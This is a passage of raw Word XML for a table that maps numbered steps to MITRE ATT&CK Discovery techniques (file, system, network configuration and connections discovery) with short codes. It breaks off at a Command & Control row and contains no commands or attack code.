              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C761ED1" w14:textId="77777777" w:rsidR="00496BEF" w:rsidRPr="00B857D7" w:rsidRDefault="00496BEF" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A890ACB" w14:textId="4B608972" w:rsidR="00496BEF" w:rsidRDefault="00B8482C" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="267009E7" w14:textId="0CC365CD" w:rsidR="00496BEF" w:rsidRPr="00B857D7" w:rsidRDefault="00B80DF1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3338BBEF" w14:textId="77777777" w:rsidR="00496BEF" w:rsidRPr="00B857D7" w:rsidRDefault="00496BEF" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A86605" w:rsidRPr="00B857D7" w14:paraId="6D451E65" w14:textId="77777777" w:rsidTr="00A86605">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04B1B58D" w14:textId="48E78A6D" w:rsidR="00A86605" w:rsidRPr="00B857D7" w:rsidRDefault="00A86605" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00E40D7B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="308E994C" w14:textId="77777777" w:rsidR="00A86605" w:rsidRPr="00B857D7" w:rsidRDefault="00A86605" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA007 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="699BBF7D" w14:textId="77777777" w:rsidR="00A86605" w:rsidRPr="00B857D7" w:rsidRDefault="00A86605" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1083 File and Directory Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="170E182C" w14:textId="4016159F" w:rsidR="00A86605" w:rsidRPr="00B857D7" w:rsidRDefault="00A86605" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00BC4827">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12C209D5" w14:textId="77777777" w:rsidR="00A86605" w:rsidRPr="00B857D7" w:rsidRDefault="00A86605" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38FFEC8C" w14:textId="77777777" w:rsidR="00A86605" w:rsidRPr="00B857D7" w:rsidRDefault="00A86605" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D228B3A" w14:textId="25CDE4D3" w:rsidR="00A86605" w:rsidRPr="00B857D7" w:rsidRDefault="00B80DF1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41441E24" w14:textId="0E34791E" w:rsidR="00A86605" w:rsidRPr="00B857D7" w:rsidRDefault="00A86605" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Discovery examples</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A86605" w:rsidRPr="00ED5880" w14:paraId="39C97CE0" w14:textId="77777777" w:rsidTr="00A86605">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FAC084C" w14:textId="6D50D383" w:rsidR="00A86605" w:rsidRPr="00ED5880" w:rsidRDefault="00A86605" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00E40D7B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55C70BF9" w14:textId="77777777" w:rsidR="00A86605" w:rsidRPr="00ED5880" w:rsidRDefault="00A86605" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA007 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50232A6B" w14:textId="77777777" w:rsidR="00A86605" w:rsidRPr="00ED5880" w:rsidRDefault="00A86605" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1082 System Information Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="701F3857" w14:textId="32278530" w:rsidR="00A86605" w:rsidRPr="00ED5880" w:rsidRDefault="00A86605" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00BC4827">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78C149E7" w14:textId="77777777" w:rsidR="00A86605" w:rsidRPr="00ED5880" w:rsidRDefault="00A86605" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A3D1D21" w14:textId="77777777" w:rsidR="00A86605" w:rsidRPr="00ED5880" w:rsidRDefault="00A86605" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0593385C" w14:textId="5D55EF00" w:rsidR="00A86605" w:rsidRPr="00ED5880" w:rsidRDefault="00B80DF1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BE5CBD4" w14:textId="29F02A22" w:rsidR="00A86605" w:rsidRPr="00ED5880" w:rsidRDefault="00E40D7B" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Discovery examples</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A86605" w:rsidRPr="00ED5880" w14:paraId="278372F1" w14:textId="77777777" w:rsidTr="00A86605">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01C876C5" w14:textId="3BA6DFCE" w:rsidR="00A86605" w:rsidRPr="00ED5880" w:rsidRDefault="00A86605" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00E40D7B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02810B6F" w14:textId="77777777" w:rsidR="00A86605" w:rsidRPr="00ED5880" w:rsidRDefault="00A86605" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA007 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BA046B8" w14:textId="77777777" w:rsidR="00A86605" w:rsidRPr="00ED5880" w:rsidRDefault="00A86605" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1016 System Network Configuration Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EC5BD75" w14:textId="33DDE59B" w:rsidR="00A86605" w:rsidRPr="00ED5880" w:rsidRDefault="00A86605" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00BC4827">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="430201AD" w14:textId="77777777" w:rsidR="00A86605" w:rsidRPr="00ED5880" w:rsidRDefault="00A86605" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F073153" w14:textId="77777777" w:rsidR="00A86605" w:rsidRPr="00ED5880" w:rsidRDefault="00A86605" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11FC1113" w14:textId="44BEB47B" w:rsidR="00A86605" w:rsidRPr="00ED5880" w:rsidRDefault="00B80DF1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E27CA2A" w14:textId="7D8D2EA4" w:rsidR="00A86605" w:rsidRPr="00ED5880" w:rsidRDefault="00E40D7B" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Discovery examples</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A86605" w:rsidRPr="00ED5880" w14:paraId="518AE53A" w14:textId="77777777" w:rsidTr="00A86605">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15EA07E1" w14:textId="5DCD7260" w:rsidR="00A86605" w:rsidRPr="00ED5880" w:rsidRDefault="00A86605" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00E40D7B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E3CFDB5" w14:textId="77777777" w:rsidR="00A86605" w:rsidRPr="00ED5880" w:rsidRDefault="00A86605" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA007 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14DDE0B9" w14:textId="77777777" w:rsidR="00A86605" w:rsidRPr="00ED5880" w:rsidRDefault="00A86605" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1049 System Network Connections Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F02D620" w14:textId="35227A80" w:rsidR="00A86605" w:rsidRPr="00ED5880" w:rsidRDefault="00A86605" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00BC4827">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4ADD56F3" w14:textId="77777777" w:rsidR="00A86605" w:rsidRPr="00ED5880" w:rsidRDefault="00A86605" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="285D9380" w14:textId="77777777" w:rsidR="00A86605" w:rsidRPr="00ED5880" w:rsidRDefault="00A86605" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28F06C92" w14:textId="631EB896" w:rsidR="00A86605" w:rsidRPr="00ED5880" w:rsidRDefault="00B80DF1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A81D310" w14:textId="2C43570B" w:rsidR="00A86605" w:rsidRPr="00ED5880" w:rsidRDefault="00E40D7B" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Discovery examples</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069470D" w:rsidRPr="00B857D7" w14:paraId="16518331" w14:textId="77777777" w:rsidTr="002B57F6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44FBAA4F" w14:textId="63E5C430" w:rsidR="0069470D" w:rsidRDefault="0069470D" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00E40D7B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05C17624" w14:textId="77777777" w:rsidR="0069470D" w:rsidRPr="00B857D7" w:rsidRDefault="0069470D" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
